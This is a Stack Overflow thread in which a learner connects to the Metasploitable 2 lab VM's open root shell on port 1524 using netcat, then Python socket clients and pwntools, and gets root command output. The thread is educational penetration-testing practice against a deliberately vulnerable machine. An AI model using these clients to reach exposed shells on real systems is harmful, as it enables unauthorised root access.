# How can I access Metasploitable 2 VM shell with python socket through open shell port?

Tags: python, linux, python-3.x, shell, sockets

I just trying to learn penetration test tools like nmap, netcat etc. now and I'm testing this tools on my Metasploitable 2 VM.When I scanned my Metasploitable machine's port, I saw there is Metasploitable root shell(1524) open port:

***1524/tcp open shell Metasploitable root shell***

When I connect to port 1524 with simple netcat tcp connection, I accessed my Metasploitable 2 VM's shell immediately:

***root@kali:~# netcat 10.0.2.4 1524***

***root@metasploitable:/#***

It was very easy even for me and I thought I can connect to the my Metasploitable 2 VM via python socket but, it was not as easy as I thought.

```
import sys
import socket
import subprocess

host = '10.0.2.4' # Metasploitable 2 VM's IP
port = 1524 # Metasploitable root shell
sock = socket.socket()
try:
    sock.connect((host, port))
except Exception as err:
    print(err)

while True:
    data = sock.recv(1024)
    cmd = input('root@nonkali:#> ')
    if cmd == 'quit':
        sock.close()
        sys.exit()
    if cmd:
        command = subprocess.Popen(data.decode('utf-8'), shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE, stdin=subprocess.PIPE)
        outs = command.stdout.read() + command.stderr.read()
        str_outs = str(outs, 'utf-8')
        sock.send(cmd.encode())
        print(str_outs)

sock.close()
```

Output:

```
root@nonkali:#> ls

/bin/sh: 1: root@metasploitable:/#: not found

ls


ls

^CTraceback (most recent call last):

  File "Python/tcp_client.py", line 15, in <module>

    data = sock.recv(4096)

KeyboardInterrupt
```

I tried some bunch of codes like this but I never access my VM's shell.
I still don't know what am I doing wrong.I need a bit help.Actually, I want to understanding difference between netcat 10.0.2.4 1524 and python socket connection.

Comment: Why don't you just send the cmd and use `subprocess.Popen()` locally ?

Comment: I tried `sock.send(cmd.encode())` and `subprocess.Popen(data.decode('utf-8'), shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE, stdin=subprocess.PIPE)` but it still gives error.

Comment: If the service on port 1524 is configured to give you back a shell then just passing the parameter (`sock.send(cmd)`) will work (if not what's the traceback). Also another and of course easier way to do it is using `pwntools`.

Comment: What is the problem? You don't appear to state what trouble you are having, where the code is failing, and what the error is. Since Stack Overflow hides the Close reason from you: *Questions seeking debugging help ("why isn't this code working?") must include the desired behavior, a specific problem or error and the shortest code necessary to reproduce it in the question itself. Questions without a clear problem statement are not useful to other readers. See: [How to create a Minimal, Complete, and Verifiable example](http://stackoverflow.com/help/mcve).*

Comment: Sorry, I attached my fail output. @coder I didn't use pwntools before but, if I can't solve the problem, I can try it.I want to know what is the difference between netcat 10.0.2.4 1524 and python socket connection.They look the same to me but, apparently they are not.

Comment: If you have a solution, you should _post it as an answer_. Please do not edit your question for this. Please consider removing the solution from your question, and post it as an answer instead.

Comment: [You do not need to mark questions as "SOLVED" via editing the title](//meta.stackexchange.com/a/116105/295637), or [posting updates/thanks in posts](//meta.stackexchange.com/a/109959/295637). Simply add your own answer, and mark as accepted. Anything additional can be perceived as noise for future visitors. See: [Can I answer my own question?](//stackoverflow.com/help/self-answer).

Answer (score 1, accepted):

I guess,I found my problem: *Threading!* I don't know exactly how works threading but,I implemented threading module to my code and It works well now.

```
#!/usr/bin/python3.6

import sys
import socket
import threading

def tcp_connect(host, port):
    global sock
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((host, port))
        interact()
    except Exception as err:
        print(err)
        sys.exit()

def recv():
    while True:
        try:
            data = sock.recv(1024)
            sys.stdout.write(data.decode('utf-8'))
            sys.stdout.flush()
        except Exception as err:
            print(err)
            sock.close()
            sys.exit()

def interact():    
    th = threading.Thread(target=recv)
    th.start()
    try:
        while True:
            cmd = sys.stdin.read(1)
            sock.send(cmd.encode())
        print('Connection closed.')
        sock.close()
        sys.exit()
    except KeyboardInterrupt:
        sock.close()
        sys.exit()

if __name__ == '__main__':
    host = '10.0.2.4'
    port = 1524
    tcp_connect(host, port)
```

And my commands are working:

```
root@metasploitable:/# id
uid=0(root) gid=0(root) groups=0(root)
```

Answer (score 1):

I'll provide two ways of doing it, that both worked for me. I tried the following on **ubuntu 17.10** (with *python 2.7.14*).
The first one is using *sockets* and establishing a *TCP connection*. The code snippet is the following:

```
#!/usr/bin/env python

import sys
from socket import *

def nc(host, port):
    s = socket(AF_INET, SOCK_STREAM) # TCP client
    s.connect((host, port))
    try:
        while 1:
            mydata = raw_input("root@root:#> ")
            if mydata.strip()!='':
                s.sendall(str(mydata))
                data = s.recv(1024)
                print data
    except KeyboardInterrupt:
        s.close()
        sys.exit(0)

if __name__ == '__main__':
    host = '...'
    port = 11111
    nc(host, port)
```

This gave me the following output:

```
$ ./test.py
root@root:#> ls
file1
testfile.zip
testfile3

root@root:#> whoami
testuser

root@root:#>
```

The other way as I said in the comments is by using [`pwntools`](https://github.com/Gallopsled/pwntools).
The script is the following:

```
from pwn import *

p = remote(host,port)
p.interactive()
```

This will work also. The main difference between the two scripts is that the first script
is a native python socket-based implementation (use standard libraries only) while the other way
even if its easier depends on `pwntools` framework and doesn't mess with low-level socket programing. Actually both scripts are nothing more than just a simple TCP-client implementation.

Comment: I tried both. pwntools connected immediately like netcat but, when I connected with python socket I can see shell but I can't command. Actually, I command but no answer.But, I guess you solved my problem.I look into https://github.com/Gallopsled/pwntools/blob/40c1796fc464b9d5d7d0aa3ba2e6d2dee6b557a5/pwnlib/tubes/tube.py source code for understand how is working `interactive()` function and I saw threading.I don't know actually how to use threading but I tried it and it works now.

Comment: @Sahexa For me socket-way worked (I spawn nc locally to test it out) - unfortunately I don't have time to install metasploitable to test it out there. Maybe you need to change the client from TCP to UDP. Also did you change the host, port to the right one?

Comment: Also threading is used for pseudo-parallelization - if you understand the code you can possible omit a threaded-based solution, though threading if implemented correctly can boost your application and make it a lot more functional.

Comment: Yes, I changed the host and port and it show me the shell but, when I tried to command, it didn't answer. It is okay. I solve the problem with threading. Now, I am trying to understand how is working threading module.I wrote my threading solution. @coder

Comment: @Sahexa Congrats!